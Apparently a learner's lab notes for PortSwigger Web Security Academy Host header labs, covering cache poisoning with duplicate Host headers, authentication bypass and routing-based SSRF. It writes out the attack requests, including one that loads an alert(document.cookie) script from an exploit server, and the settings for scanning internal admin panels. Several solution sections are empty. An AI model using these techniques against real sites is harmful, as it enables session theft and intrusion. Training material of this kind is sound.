HTTP Host header attacks

https://portswigger.net/web-security/host-header

Lab: Web cache poisoning via ambiguous requests

This lab is vulnerable to web cache poisoning due to discrepancies in how the cache and the back-end application handle ambiguous requests. An unsuspecting user regularly visits the site's home page.

To solve the lab, poison the cache so the home page executes alert(document.cookie) in the victim's browser.

GET / HTTP/1.1
Host: aca21fda1e02fa41c09e7b5d00b800ba.web-security-academy.net
Host: test

In response:
<script type="text/javascript" src="//test/resources/js/tracking.js"></script>

Exploit Server ->

File:
	/resources/js/tracking.js
Body:
	alert(document.cookie)

Solution:

GET / HTTP/1.1
Host: aca21fda1e02fa41c09e7b5d00b800ba.web-security-academy.net
Host: exploit-acf41f041e12fa04c0737b2e0120004e.web-security-academy.net

Lab: Host header authentication bypass

This lab makes an assumption about the privilege level of the user based on the HTTP Host header.

To solve the lab, access the admin panel and delete Carlos's account.

/robots.txt -> /admin

Solution:

Lab: Routing-based SSRF

This lab is vulnerable to routing-based SSRF via the Host header. You can exploit this to access an insecure intranet admin panel located on an internal IP address.

To solve the lab, access the internal admin panel located in the 192.168.0.0/24 range, then delete Carlos.

Sniper Attack -> Numbers -> Sequential, From:0, To:255, Step:1, Max fraction digits:0

Solution:

Lab: SSRF via flawed request parsing

This lab is vulnerable to routing-based SSRF due to its flawed parsing of the request's intended host. You can exploit this to access an insecure intranet admin panel located at an internal IP address.

To solve the lab, access the internal admin panel located in the 192.168.0.0/24 range, then delete Carlos.

Sniper Attack -> Numbers -> Sequential, From:0, To:255, Step:1, Max fraction digits:0

Solution:

PreviousWeb cache poisoningNextHTTP request smuggling

Last updated